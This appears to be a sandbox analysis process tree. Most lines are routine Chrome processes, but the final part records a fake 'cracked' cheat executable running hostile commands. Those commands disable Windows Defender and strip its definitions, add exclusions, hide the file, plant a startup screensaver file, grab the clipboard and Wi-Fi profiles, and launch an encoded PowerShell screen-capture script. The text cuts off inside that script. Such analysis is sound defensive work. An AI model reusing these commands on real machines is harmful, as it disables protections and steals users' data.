"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2996 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:2736

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --mojo-platform-channel-handle=4312 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:4328

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4492 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:8
2⤵
PID:4860

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4624 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:8
2⤵
PID:3304

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4780 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:8
2⤵
PID:4652

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5024 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:8
2⤵
PID:4480

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5076 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:8
2⤵
PID:1648

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --mojo-platform-channel-handle=4504 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:2180

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --mojo-platform-channel-handle=3004 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:840

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --mojo-platform-channel-handle=2984 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:5112

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --mojo-platform-channel-handle=3200 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:3840

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=3180 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:4840

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=5492 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:5076

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5516 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:8
2⤵
PID:2304

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --mojo-platform-channel-handle=5444 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:4888

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --mojo-platform-channel-handle=5728 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:3784

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --mojo-platform-channel-handle=5944 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:4484

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --mojo-platform-channel-handle=6100 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:4740

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --mojo-platform-channel-handle=6232 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:4364

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --mojo-platform-channel-handle=6476 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:2004

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --mojo-platform-channel-handle=6484 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:908

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --mojo-platform-channel-handle=6752 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:4644

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --mojo-platform-channel-handle=6612 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:1380

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --mojo-platform-channel-handle=7152 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:5140

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --mojo-platform-channel-handle=7140 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:5148

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --mojo-platform-channel-handle=7288 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:5272

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --mojo-platform-channel-handle=7452 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:5360

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --mojo-platform-channel-handle=7464 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:5452

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --mojo-platform-channel-handle=7820 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:5460

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --mojo-platform-channel-handle=8100 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:5468

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --mojo-platform-channel-handle=8128 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:5476

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --mojo-platform-channel-handle=8292 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:5484

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --mojo-platform-channel-handle=8300 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:5492

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --mojo-platform-channel-handle=8440 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:5500

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --mojo-platform-channel-handle=7272 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:5832

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --mojo-platform-channel-handle=8268 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:5840

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9488 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:8
2⤵
PID:6036

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9492 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:8
2⤵
PID:6044

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --mojo-platform-channel-handle=9532 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:6120

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --mojo-platform-channel-handle=8616 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:6124

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --mojo-platform-channel-handle=9656 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:5656

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --mojo-platform-channel-handle=9780 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:5272

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --mojo-platform-channel-handle=8232 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:6036

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --mojo-platform-channel-handle=9140 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:6184

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --mojo-platform-channel-handle=9132 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:6228

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --mojo-platform-channel-handle=10100 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:6352

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --mojo-platform-channel-handle=8296 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:6472

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --mojo-platform-channel-handle=10468 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:6536

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --mojo-platform-channel-handle=10720 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:6600

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --mojo-platform-channel-handle=10224 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:6608

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=56 --mojo-platform-channel-handle=10264 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:6736

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10952 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:8
2⤵
PID:6744

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=58 --mojo-platform-channel-handle=10196 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:1
2⤵
PID:6820

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=11096 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:8
2⤵
PID:6936

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=11108 --field-trial-handle=1984,i,4770285785880930303,16948015001272248783,131072 /prefetch:8
2⤵
PID:6944

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:5112

C:\Users\Admin\Downloads\NeverloseCrackedBykL.exe
"C:\Users\Admin\Downloads\NeverloseCrackedBykL.exe"
1⤵
PID:6960

C:\Users\Admin\Downloads\NeverloseCrackedBykL.exe
"C:\Users\Admin\Downloads\NeverloseCrackedBykL.exe"
2⤵
- Loads dropped DLL
PID:5696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\NeverloseCrackedBykL.exe'"
3⤵
PID:5884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\NeverloseCrackedBykL.exe'
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:5668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
3⤵
PID:5684

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:6696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:5548

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:5448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
3⤵
PID:5400

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
4⤵
PID:6708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
3⤵
PID:6484

C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
4⤵
PID:6532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
3⤵
PID:5556

C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
4⤵
PID:6092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
3⤵
PID:4884

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
4⤵
- Detects videocard installed
PID:4176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
3⤵
PID:7148

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
4⤵
- Detects videocard installed
PID:3768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Downloads\NeverloseCrackedBykL.exe""
3⤵
PID:3148

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\Downloads\NeverloseCrackedBykL.exe"
4⤵
- Views/modifies file attributes
PID:432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍ ‏ .scr'"
3⤵
PID:1032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍ ‏ .scr'
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:1140

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:2304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:6464

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:3508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
3⤵
PID:6740

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
4⤵
PID:3712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
3⤵
PID:6792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
4⤵
PID:2812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:6800

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:5204

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:5992

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:3032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
3⤵
PID:6768

C:\Windows\system32\netsh.exe
netsh wlan show profile
4⤵
PID:5340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
3⤵
PID:1280

C:\Windows\system32\systeminfo.exe
systeminfo
4⤵
- Gathers system information
PID:5200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
3⤵
PID:1596

C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
4⤵
PID:5956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAY